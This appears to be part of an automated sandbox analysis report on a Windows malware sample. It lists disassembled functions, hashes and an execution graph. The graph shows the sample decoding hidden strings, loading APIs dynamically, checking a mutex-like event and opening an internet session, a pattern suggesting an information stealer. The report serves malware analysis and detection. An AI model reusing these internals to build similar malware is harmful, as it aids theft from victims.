                                                                                    • API String ID: 3527080286-4141555692
                                                                                    • Opcode ID: 496e1977636cea08a43dd5f6f215944c8db14269d8befdc0e70d6a213646f343
                                                                                    • Instruction ID: f829ef5a6adca9de2067643db49978c42fb6afdd75baeccc404cb67ef312ede8
                                                                                    • Opcode Fuzzy Hash: 496e1977636cea08a43dd5f6f215944c8db14269d8befdc0e70d6a213646f343
                                                                                    • Instruction Fuzzy Hash: A251777190060EDBCF108F69E84C1BDBFF6BB44314F514259D681A73B4CB7A8A268B55
                                                                                    Function 006E5DAF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Fputc
                                                                                    • String ID: mEn
                                                                                    • API String ID: 3078413507-2555016830
                                                                                    • Opcode ID: 2376f04e7e73f979c57ea049da1116a1542ded1880236888e50e886106659f69
                                                                                    • Instruction ID: a5f4ee72e25c8ab01984b1b3ab50f47bb07a9c7e8012501828baada330ac19f8
                                                                                    • Opcode Fuzzy Hash: 2376f04e7e73f979c57ea049da1116a1542ded1880236888e50e886106659f69
                                                                                    • Instruction Fuzzy Hash: 0B41863590275AABCF14DF66D4819EE77BAFF08318B14015AE506A7740EB31EE41CB94
                                                                                    Function 006EAB2D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 006EAB52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 2118026453-2084237596
                                                                                    • Opcode ID: 54a828741adf40c1297eb822eaecd0355ce26bed7196368f2cd27bb11ecfe485
                                                                                    • Instruction ID: b3fce642420835c2311dd74a76a46997387e864926117b384456bb656b9f3e64
                                                                                    • Opcode Fuzzy Hash: 54a828741adf40c1297eb822eaecd0355ce26bed7196368f2cd27bb11ecfe485
                                                                                    • Instruction Fuzzy Hash: E3417931901249EFCF16CF95C981EEEBBB6FF48300F248099F909A7251D335A951DB52
                                                                                    Function 006E1D31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 006E1D36
                                                                                      • Part of subcall function 006E3D97: std::invalid_argument::invalid_argument.LIBCONCRT ref: 006E3DA3
                                                                                    • _Deallocate.LIBCONCRT ref: 006E1DD3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DeallocateXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                    • String ID: map/set too long
                                                                                    • API String ID: 2273164399-558153379
                                                                                    • Opcode ID: 7e3c9d471c262ccf33cce9f34f0c552664ba97d50be470fd064e3d3d8544df27
                                                                                    • Instruction ID: 18c9988e49f7adf7f9a49d42d680e2c5eb9dcd9fb28230a205183e0a734e1a76
                                                                                    • Opcode Fuzzy Hash: 7e3c9d471c262ccf33cce9f34f0c552664ba97d50be470fd064e3d3d8544df27
                                                                                    • Instruction Fuzzy Hash: 4B014C63A0138466EF096E3E0C654EFABA6EFD6310B1CC66DD499DB742C17815026750
                                                                                    Function 006E5279 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E5285
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E52E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                    • String ID: mEn
                                                                                    • API String ID: 593203224-2555016830
                                                                                    • Opcode ID: 30bdad64a7bb7b829936f74e463f97eade0965408e2336494d4e64cdb900b692
                                                                                    • Instruction ID: 0322f6763c4807743417f910e8c687c1c330c9cffe80d81ea132c0ff495c4b77
                                                                                    • Opcode Fuzzy Hash: 30bdad64a7bb7b829936f74e463f97eade0965408e2336494d4e64cdb900b692
                                                                                    • Instruction Fuzzy Hash: 11019E31601658EFCB04DF59C889E9D77BAEF84764F1401A9E902AB360DF70EE40CB50
                                                                                    Function 006E1665 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E166C
                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006E16A4
                                                                                      • Part of subcall function 006E52EA: _Yarn.LIBCPMT ref: 006E5309
                                                                                      • Part of subcall function 006E52EA: _Yarn.LIBCPMT ref: 006E532D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 1908188788-1405518554
                                                                                    • Opcode ID: a58cfe1bdf76d9db9e04ffbe85503f1b2fbe6c7ef545aab7c2e05ee70a0cbe1d
                                                                                    • Instruction ID: d7b06c6b6f2b80b6998c9d69ab8c3c53282e16d56052a31f75f240c8d96a5e39
                                                                                    • Opcode Fuzzy Hash: a58cfe1bdf76d9db9e04ffbe85503f1b2fbe6c7ef545aab7c2e05ee70a0cbe1d
                                                                                    • Instruction Fuzzy Hash: C1F01771506B90DE83319F7B8881447FBE4BE29320394CA6EE1DEC3A11D734A544CF6A
                                                                                    Function 006F2BC2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,0070A100,00000FA0,00000000,00000000,?,?,00000003,006F23A3), ref: 006F2C02
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx$mEn
                                                                                    • API String ID: 2593887523-3150776048
                                                                                    • Opcode ID: 6e7e1416b90bf8078a37c737dd98ae4bdeda15b8e1565b82e2ec55972764aa47
                                                                                    • Instruction ID: 11c2efb57993d3c472571cc01b12fedff916b16e0cf8551f561e07b38b38746a
                                                                                    • Opcode Fuzzy Hash: 6e7e1416b90bf8078a37c737dd98ae4bdeda15b8e1565b82e2ec55972764aa47
                                                                                    • Instruction Fuzzy Hash: 5DE06D32680219F7CB116F50DC09E9E3F66DB047A1F008211FE18251A1CA759861DAC4
                                                                                    Function 006F2A48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc$mEn
                                                                                    • API String ID: 2773662609-2397785389
                                                                                    • Opcode ID: 2f40b5f85dfb786146564ef11589ecdb6753dc7b262fb4590317414fbcda0063
                                                                                    • Instruction ID: 74200229f9725872a419c4f433438a755ac5c23b76db9eabad5a8e5a0421ba38
                                                                                    • Opcode Fuzzy Hash: 2f40b5f85dfb786146564ef11589ecdb6753dc7b262fb4590317414fbcda0063
                                                                                    • Instruction Fuzzy Hash: C7E0C23178132DF3C23137A19C1AEFEBE4B8B44BB0B004221FF04212D19EA849008AD9

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.8%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:11.2%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:40
                                                                                    execution_graph 94312 417250 94336 40254e 94312->94336 94320 417274 94434 40fa9c _EH_prolog lstrlenA 94320->94434 94323 40fa9c 4 API calls 94324 41729b 94323->94324 94325 40fa9c 4 API calls 94324->94325 94326 4172a2 94325->94326 94438 40f9e1 94326->94438 94328 4172ab 94329 4172ee OpenEventA 94328->94329 94330 4172d4 CloseHandle Sleep 94329->94330 94331 4172fb 94329->94331 94632 40fb4d 94330->94632 94333 417303 CreateEventA 94331->94333 94442 41695f _EH_prolog 94333->94442 94633 4024d7 memset 94336->94633 94338 402562 94339 4024d7 9 API calls 94338->94339 94340 402573 94339->94340 94341 4024d7 9 API calls 94340->94341 94342 402584 94341->94342 94343 4024d7 9 API calls 94342->94343 94344 402595 94343->94344 94345 4024d7 9 API calls 94344->94345 94346 4025a6 94345->94346 94347 4024d7 9 API calls 94346->94347 94348 4025b7 94347->94348 94349 4024d7 9 API calls 94348->94349 94350 4025c8 94349->94350 94351 4024d7 9 API calls 94350->94351 94352 4025d9 94351->94352 94353 4024d7 9 API calls 94352->94353 94354 4025ea 94353->94354 94355 4024d7 9 API calls 94354->94355 94356 4025fb 94355->94356 94357 4024d7 9 API calls 94356->94357 94358 40260c 94357->94358 94359 4024d7 9 API calls 94358->94359 94360 40261d 94359->94360 94361 4024d7 9 API calls 94360->94361 94362 40262e 94361->94362 94363 4024d7 9 API calls 94362->94363 94364 40263f 94363->94364 94365 4024d7 9 API calls 94364->94365 94366 402650 94365->94366 94367 4024d7 9 API calls 94366->94367 94368 402661 94367->94368 94369 4024d7 9 API calls 94368->94369 94370 402672 94369->94370 94371 4024d7 9 API calls 94370->94371 94372 402683 94371->94372 94373 4024d7 9 API calls 94372->94373 94374 402694 94373->94374 94375 4024d7 9 API calls 94374->94375 94376 4026a5 94375->94376 94377 4024d7 9 API calls 94376->94377 94378 4026b6 94377->94378 94379 4024d7 9 API calls 94378->94379 94380 4026c7 94379->94380 94381 4024d7 9 API calls 94380->94381 94382 4026d8 94381->94382 94383 4024d7 9 API calls 94382->94383 94384 4026e9 94383->94384 94385 4024d7 9 API calls 94384->94385 94386 4026fa 94385->94386 94387 4024d7 9 API calls 94386->94387 94388 40270b 94387->94388 94389 4024d7 9 API calls 94388->94389 94390 40271c 94389->94390 94391 4024d7 9 API calls 94390->94391 94392 40272d 94391->94392 94393 4024d7 9 API calls 94392->94393 94394 40273e 94393->94394 94395 4024d7 9 API calls 94394->94395 94396 40274f 94395->94396 94397 4024d7 9 API calls 94396->94397 94398 402760 94397->94398 94399 4024d7 9 API calls 94398->94399 94400 402771 94399->94400 94401 4024d7 9 API calls 94400->94401 94402 402782 94401->94402 94403 4024d7 9 API calls 94402->94403 94404 402793 94403->94404 94405 4024d7 9 API calls 94404->94405 94406 4027a4 94405->94406 94407 4024d7 9 API calls 94406->94407 94408 4027b5 94407->94408 94409 4024d7 9 API calls 94408->94409 94410 4027c6 94409->94410 94411 4024d7 9 API calls 94410->94411 94412 4027d7 94411->94412 94413 4024d7 9 API calls 94412->94413 94414 4027e8 94413->94414 94415 417330 LoadLibraryA 94414->94415 94416 417348 94415->94416 94417 41753a LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 94415->94417 94426 417369 20 API calls 94416->94426 94418 417598 GetProcAddress 94417->94418 94419 4175aa 94417->94419 94418->94419 94420 4175b3 GetProcAddress GetProcAddress 94419->94420 94421 4175dc 94419->94421 94420->94421 94422 4175e5 GetProcAddress 94421->94422 94423 4175f7 94421->94423 94422->94423 94424 417600 GetProcAddress 94423->94424 94425 417612 94423->94425 94424->94425 94427 417262 94425->94427 94428 41761b GetProcAddress GetProcAddress 94425->94428 94426->94417 94429 40f923 94427->94429 94428->94427 94431 40f931 94429->94431 94430 40f953 94433 40fbcb GetProcessHeap HeapAlloc GetUserNameA 94430->94433 94431->94430 94432 40f949 lstrcpy 94431->94432 94432->94430 94433->94320 94436 40fadc 94434->94436 94435 40fb01 94435->94323 94436->94435 94437 40faee lstrcpy lstrcat 94436->94437 94437->94435 94439 40f9f7 94438->94439 94440 40fa20 94439->94440 94441 40fa18 lstrcpy 94439->94441 94440->94328 94441->94440 94443 416973 94442->94443 94444 40f923 lstrcpy 94443->94444 94445 416986 94444->94445 94654 4134fd _EH_prolog 94445->94654 94447 416996 94656 4135ac _EH_prolog 94447->94656 94449 4169a5 94658 40f997 lstrlenA 94449->94658 94452 40f997 2 API calls 94453 4169c9 94452->94453 94662 4027ef 94453->94662 94459 416aba 94460 40f9e1 lstrcpy 94459->94460 94461 416acc 94460->94461 94462 40f923 lstrcpy 94461->94462 94463 416aeb 94462->94463 94464 40fa9c 4 API calls 94463->94464 94465 416b04 94464->94465 95252 40fa28 _EH_prolog 94465->95252 94468 40f9e1 lstrcpy 94469 416b2d 94468->94469 94470 416b54 CreateDirectoryA 94469->94470 95256 4010b1 _EH_prolog 94470->95256 94478 416b9d 94479 40f9e1 lstrcpy 94478->94479 94480 416baf 94479->94480 94481 40f9e1 lstrcpy 94480->94481 94482 416bc1 94481->94482 95379 40f95a 94482->95379 94485 40fa9c 4 API calls 94486 416be5 94485->94486 94487 40f9e1 lstrcpy 94486->94487 94488 416bf2 94487->94488 94489 40fa28 3 API calls 94488->94489 94490 416c11 94489->94490 94491 40f9e1 lstrcpy 94490->94491 94492 416c1e 94491->94492 94493 416c39 InternetOpenA 94492->94493 95383 40fb4d 94493->95383 94495 416c55 InternetOpenA 94496 40f95a lstrcpy 94495->94496 94497 416c85 94496->94497 94498 40f923 lstrcpy 94497->94498 94499 416c9c 94498->94499 95384 4104dd _EH_prolog GetWindowsDirectoryA 94499->95384 94502 40f95a lstrcpy 94503 416cc5 94502->94503 95403 403af5 _EH_prolog 94503->95403 94505 416ccf 95539 411cd8 _EH_prolog 94505->95539 94507 416cd7 94508 40f923 lstrcpy 94507->94508 94509 416d0b 94508->94509 94510 4010b1 2 API calls 94509->94510 94511 416d23 94510->94511 95559 40514c _EH_prolog 94511->95559 94513 416d2d 95738 411715 _EH_prolog 94513->95738 94515 416d35 94516 40f923 lstrcpy 94515->94516 94517 416d5d 94516->94517 94518 4010b1 2 API calls 94517->94518 94519 416d75 94518->94519 94520 40514c 46 API calls 94519->94520 94521 416d7f 94520->94521 95746 4114ee _EH_prolog 94521->95746 94523 416d87 94524 40f923 lstrcpy 94523->94524 94525 416daf 94524->94525 94526 4010b1 2 API calls 94525->94526 94527 416dc7 94526->94527 94528 40514c 46 API calls 94527->94528 94529 416dd1 94528->94529 95757 411649 _EH_prolog 94529->95757 94531 416dd9 94532 4010b1 2 API calls 94531->94532 94533 416ded 94532->94533 95766 414604 _EH_prolog 94533->95766 94536 40f95a lstrcpy 94537 416e06 94536->94537 94538 40f923 lstrcpy 94537->94538 94539 416e20 94538->94539 96108 4041b2 _EH_prolog 94539->96108 94541 416e29 94542 4010b1 2 API calls 94541->94542 94543 416e61 94542->94543 96127 40ed08 _EH_prolog 94543->96127 94632->94329 94638 40245c 94633->94638 94637 402536 memset 94637->94338 94650 4181c0 94638->94650 94643 410b12 94644 4024be CryptStringToBinaryA 94643->94644 94645 4024d0 strcat GetProcessHeap RtlAllocateHeap 94644->94645 94646 402308 94645->94646 94647 40231b 94646->94647 94648 40238b ??_U@YAPAXI 94647->94648 94649 4023a6 94648->94649 94649->94637 94651 402469 memset 94650->94651 94652 410b12 94651->94652 94653 40249e CryptStringToBinaryA 94652->94653 94653->94643 94655 413513 94654->94655 94655->94447 94657 4135c2 94656->94657 94657->94449 94659 40f9af 94658->94659 94660 40f9da 94659->94660 94661 40f9d0 lstrcpy 94659->94661 94660->94452 94661->94660 94663 4024d7 9 API calls 94662->94663 94664 4027f9 94663->94664 94665 4024d7 9 API calls 94664->94665 94666 40280a 94665->94666 94667 4024d7 9 API calls 94666->94667 94668 40281b 94667->94668 94669 4024d7 9 API calls 94668->94669 94670 40282c 94669->94670 94671 4024d7 9 API calls 94670->94671 94672 40283d 94671->94672 94673 4024d7 9 API calls 94672->94673 94674 40284e 94673->94674 94675 4024d7 9 API calls 94674->94675 94676 40285f 94675->94676 94677 4024d7 9 API calls 94676->94677 94678 402870 94677->94678 94679 4024d7 9 API calls 94678->94679 94680 402881 94679->94680 94681 4024d7 9 API calls 94680->94681 94682 402892 94681->94682 94683 4024d7 9 API calls 94682->94683 94684 4028a3 94683->94684 94685 4024d7 9 API calls 94684->94685 94686 4028b4 94685->94686 94687 4024d7 9 API calls 94686->94687 94688 4028c5 94687->94688 94689 4024d7 9 API calls 94688->94689 94690 4028d6 94689->94690 94691 4024d7 9 API calls 94690->94691 94692 4028e7 94691->94692 94693 4024d7 9 API calls 94692->94693 94694 4028f8 94693->94694 94695 4024d7 9 API calls 94694->94695 94696 402909 94695->94696 94697 4024d7 9 API calls 94696->94697 94698 40291a 94697->94698 94699 4024d7 9 API calls 94698->94699 94700 40292b 94699->94700 94701 4024d7 9 API calls 94700->94701 94702 40293c 94701->94702 94703 4024d7 9 API calls 94702->94703 94704 40294d 94703->94704 94705 4024d7 9 API calls 94704->94705 94706 40295e 94705->94706 94707 4024d7 9 API calls 94706->94707 94708 40296f 94707->94708 94709 4024d7 9 API calls 94708->94709 94710 402980 94709->94710 94711 4024d7 9 API calls 94710->94711 94712 402991 94711->94712 94713 4024d7 9 API calls 94712->94713 94714 4029a2 94713->94714 94715 4024d7 9 API calls 94714->94715 94716 4029b3 94715->94716 94717 4024d7 9 API calls 94716->94717 94718 4029c4 94717->94718 94719 4024d7 9 API calls 94718->94719 94720 4029d5 94719->94720 94721 4024d7 9 API calls 94720->94721 94722 4029e6 94721->94722 94723 4024d7 9 API calls 94722->94723 94724 4029f7 94723->94724 94725 4024d7 9 API calls 94724->94725 94726 402a08 94725->94726 94727 4024d7 9 API calls 94726->94727 94728 402a19 94727->94728 94729 4024d7 9 API calls 94728->94729 94730 402a2a 94729->94730 94731 4024d7 9 API calls 94730->94731 94732 402a3b 94731->94732 94733 4024d7 9 API calls 94732->94733 94734 402a4c 94733->94734 94735 4024d7 9 API calls 94734->94735 94736 402a5d 94735->94736 94737 4024d7 9 API calls 94736->94737 94738 402a6e 94737->94738 94739 4024d7 9 API calls 94738->94739 94740 402a7f 94739->94740 94741 4024d7 9 API calls 94740->94741 94742 402a90 94741->94742 94743 4024d7 9 API calls 94742->94743 94744 402aa1 94743->94744 94745 4024d7 9 API calls 94744->94745 94746 402ab2 94745->94746 94747 4024d7 9 API calls 94746->94747 94748 402ac3 94747->94748 94749 4024d7 9 API calls 94748->94749 94750 402ad4 94749->94750 94751 4024d7 9 API calls 94750->94751 94752 402ae5 94751->94752 94753 4024d7 9 API calls 94752->94753 94754 402af6 94753->94754 94755 4024d7 9 API calls 94754->94755 94756 402b07 94755->94756 94757 4024d7 9 API calls 94756->94757 94758 402b18 94757->94758 94759 4024d7 9 API calls 94758->94759 94760 402b29 94759->94760 94761 4024d7 9 API calls 94760->94761 94762 402b3a 94761->94762 94763 4024d7 9 API calls 94762->94763 94764 402b4b 94763->94764 94765 4024d7 9 API calls 94764->94765 94766 402b5c 94765->94766 94767 4024d7 9 API calls 94766->94767 94768 402b6d 94767->94768 94769 4024d7 9 API calls 94768->94769 94770 402b7e 94769->94770 94771 4024d7 9 API calls 94770->94771 94772 402b8f 94771->94772 94773 4024d7 9 API calls 94772->94773 94774 402ba0 94773->94774 94775 4024d7 9 API calls 94774->94775 94776 402bb1 94775->94776 94777 4024d7 9 API calls 94776->94777 94778 402bc2 94777->94778 94779 4024d7 9 API calls 94778->94779 94780 402bd3 94779->94780 94781 4024d7 9 API calls 94780->94781 94782 402be4 94781->94782 94783 4024d7 9 API calls 94782->94783 94784 402bf5 94783->94784 94785 4024d7 9 API calls 94784->94785 94786 402c06 94785->94786 94787 4024d7 9 API calls 94786->94787 94788 402c17 94787->94788 94789 4024d7 9 API calls 94788->94789 94790 402c28 94789->94790 94791 4024d7 9 API calls 94790->94791 94792 402c39 94791->94792 94793 4024d7 9 API calls 94792->94793 94794 402c4a 94793->94794 94795 4024d7 9 API calls 94794->94795 94796 402c5b 94795->94796 94797 4024d7 9 API calls 94796->94797 94798 402c6c 94797->94798 94799 4024d7 9 API calls 94798->94799 94800 402c7d 94799->94800 94801 4024d7 9 API calls 94800->94801 94802 402c8e 94801->94802 94803 4024d7 9 API calls 94802->94803 94804 402c9f 94803->94804 94805 4024d7 9 API calls 94804->94805 94806 402cb0 94805->94806 94807 4024d7 9 API calls 94806->94807 94808 402cc1 94807->94808 94809 4024d7 9 API calls 94808->94809 94810 402cd2 94809->94810 94811 4024d7 9 API calls 94810->94811 94812 402ce3 94811->94812 94813 4024d7 9 API calls 94812->94813 94814 402cf4 94813->94814 94815 4024d7 9 API calls 94814->94815 94816 402d05 94815->94816 94817 4024d7 9 API calls 94816->94817 94818 402d16 94817->94818 94819 4024d7 9 API calls 94818->94819 94820 402d27 94819->94820 94821 4024d7 9 API calls 94820->94821 94822 402d38 94821->94822 94823 4024d7 9 API calls 94822->94823 94824 402d49 94823->94824 94825 4024d7 9 API calls 94824->94825 94826 402d5a 94825->94826 94827 4024d7 9 API calls 94826->94827 94828 402d6b 94827->94828 94829 4024d7 9 API calls 94828->94829 94830 402d7c 94829->94830 94831 4024d7 9 API calls 94830->94831 94832 402d8d 94831->94832 94833 4024d7 9 API calls 94832->94833 94834 402d9e 94833->94834 94835 4024d7 9 API calls 94834->94835 94836 402daf 94835->94836 94837 4024d7 9 API calls 94836->94837 94838 402dc0 94837->94838 94839 4024d7 9 API calls 94838->94839 94840 402dd1 94839->94840 94841 4024d7 9 API calls 94840->94841 94842 402de2 94841->94842 94843 4024d7 9 API calls 94842->94843 94844 402df3 94843->94844 94845 4024d7 9 API calls 94844->94845 94846 402e04 94845->94846 94847 4024d7 9 API calls 94846->94847 94848 402e15 94847->94848 94849 4024d7 9 API calls 94848->94849 94850 402e26 94849->94850 94851 4024d7 9 API calls 94850->94851 94852 402e37 94851->94852 94853 4024d7 9 API calls 94852->94853 94854 402e48 94853->94854 94855 4024d7 9 API calls 94854->94855 94856 402e59 94855->94856 94857 4024d7 9 API calls 94856->94857 94858 402e6a 94857->94858 94859 4024d7 9 API calls 94858->94859 94860 402e7b 94859->94860 94861 4024d7 9 API calls 94860->94861 94862 402e8c 94861->94862 94863 4024d7 9 API calls 94862->94863 94864 402e9d 94863->94864 94865 4024d7 9 API calls 94864->94865 94866 402eae 94865->94866 94867 4024d7 9 API calls 94866->94867 94868 402ebf 94867->94868 94869 4024d7 9 API calls 94868->94869 94870 402ed0 94869->94870 94871 4024d7 9 API calls 94870->94871 94872 402ee1 94871->94872 94873 4024d7 9 API calls 94872->94873 94874 402ef2 94873->94874 94875 4024d7 9 API calls 94874->94875 94876 402f03 94875->94876 94877 4024d7 9 API calls 94876->94877 94878 402f14 94877->94878 94879 4024d7 9 API calls 94878->94879 94880 402f25 94879->94880 94881 4024d7 9 API calls 94880->94881 94882 402f36 94881->94882 94883 4024d7 9 API calls 94882->94883 94884 402f47 94883->94884 94885 4024d7 9 API calls 94884->94885 94886 402f58 94885->94886 94887 4024d7 9 API calls 94886->94887 94888 402f69 94887->94888 94889 4024d7 9 API calls 94888->94889 94890 402f7a 94889->94890 94891 4024d7 9 API calls 94890->94891 94892 402f8b 94891->94892 94893 4024d7 9 API calls 94892->94893 94894 402f9c 94893->94894 94895 4024d7 9 API calls 94894->94895 94896 402fad 94895->94896 94897 4024d7 9 API calls 94896->94897 94898 402fbe 94897->94898 94899 4024d7 9 API calls 94898->94899 94900 402fcf 94899->94900 94901 4024d7 9 API calls 94900->94901 94902 402fe0 94901->94902 94903 4024d7 9 API calls 94902->94903 94904 402ff1 94903->94904 94905 4024d7 9 API calls 94904->94905 94906 403002 94905->94906 94907 4024d7 9 API calls 94906->94907 94908 403013 94907->94908 94909 4024d7 9 API calls 94908->94909 94910 403024 94909->94910 94911 4024d7 9 API calls 94910->94911 94912 403035 94911->94912 94913 4024d7 9 API calls 94912->94913 94914 403046 94913->94914 94915 4024d7 9 API calls 94914->94915 94916 403057 94915->94916 